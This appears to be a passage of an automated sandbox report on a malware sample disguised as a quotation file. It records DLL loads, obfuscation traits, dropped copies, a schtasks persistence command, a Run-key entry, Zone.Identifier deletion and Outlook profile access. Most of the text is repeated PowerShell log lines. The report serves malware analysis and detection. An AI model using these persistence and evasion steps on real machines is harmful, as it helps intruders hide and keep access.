                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: userenv.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: rasapi32.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: rasman.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: rtutils.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: mswsock.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: winhttp.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: ondemandconnroutehelper.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: iphlpapi.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: dhcpcsvc6.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: dhcpcsvc.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: dnsapi.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: winnsi.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: rasadhlp.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: fwpuclnt.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: secur32.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: schannel.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: mskeyprotect.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: ntasn1.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: ncrypt.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: ncryptsslp.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: msasn1.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: gpapi.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: vaultcli.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: wintypes.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: dpapi.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: edputil.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: windowscodecs.dll
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
                    Source: Window Recorder Window detected: More than 3 window changes detected
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\Profiles
                    Source: rQuotation3200025006.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                    Source: rQuotation3200025006.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                    Data Obfuscation

                    Source: rQuotation3200025006.exe, Form1.cs .Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
                    Source: 0.2.rQuotation3200025006.exe.4fb0000.4.raw.unpack, JK.cs .Net Code: ve System.Reflection.Assembly.Load(byte[])
                    Source: 0.2.rQuotation3200025006.exe.26e8b6c.0.raw.unpack, JK.cs .Net Code: ve System.Reflection.Assembly.Load(byte[])
                    Source: 0.2.rQuotation3200025006.exe.6f70000.5.raw.unpack, KHpWQ0SIuHGDwagjf6.cs .Net Code: ouhZd92ZvS System.Reflection.Assembly.Load(byte[])
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exe Code function: 0_2_04BBFC58 pushfd ; retf 0_2_04BBFC5A
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exe Code function: 0_2_04BB1888 pushad ; retf 0_2_04BB1889
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exe Code function: 0_2_06CC4710 push eax; retf 0_2_06CC4711
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exe Code function: 0_2_06CC7B85 push FFFFFF8Bh; iretd 0_2_06CC7B87
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exe Code function: 0_2_06CC4B83 pushad ; iretd 0_2_06CC4B85
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exe Code function: 9_2_06AC5168 pushad ; iretd 9_2_06AC5169
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exe Code function: 9_2_06AC6F2D push FFFFFF8Bh; iretd 9_2_06AC6F2F
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exe Code function: 14_2_018CF8E8 pushad ; retf 14_2_018CF8F1
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exe Code function: 14_2_018C0C55 push edi; retf 14_2_018C0C7A
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe Code function: 16_2_066D6F2D push FFFFFF8Bh; iretd 16_2_066D6F2F
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe Code function: 16_2_066D5168 pushad ; iretd 16_2_066D5169
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe Code function: 25_2_05426105 push esi; iretd 25_2_05426106
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe Code function: 25_2_07276E6D push FFFFFF8Bh; iretd 25_2_07276E6F
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe Code function: 28_2_032CF7C8 pushad ; retf 28_2_032CF7D1
                    Source: rQuotation3200025006.exe Static PE information: section name: .text entropy: 7.946103748533992
                    Source: pBBqGOzrz.exe.0.dr Static PE information: section name: .text entropy: 7.946103748533992
                    Source: 0.2.rQuotation3200025006.exe.4fb0000.4.raw.unpack, JK.cs High entropy of concatenated method names: 'JK', 'Y3', 'Lv', 'F5', 'q9', 'Ou', 'NL', 'tg', 'Jy', 'kq'
                    Source: 0.2.rQuotation3200025006.exe.26e8b6c.0.raw.unpack, JK.cs High entropy of concatenated method names: 'JK', 'Y3', 'Lv', 'F5', 'q9', 'Ou', 'NL', 'tg', 'Jy', 'kq'
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exe File created: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe (dropped file)
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exe File created: C:\Users\user\AppData\Roaming\pBBqGOzrz.exe (dropped file)

                    Boot Survival

                    Source: C:\Users\user\Desktop\rQuotation3200025006.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\pBBqGOzrz" /XML "C:\Users\user\AppData\Local\Temp\tmp3D2.tmp"
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run sgxIb

                    Hooking and other Techniques for Hiding and Protection

                    Source: C:\Users\user\Desktop\rQuotation3200025006.exe File opened: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe:Zone.Identifier read attributes | delete
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exe File opened: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe:Zone.Identifier read attributes | delete
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exe Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
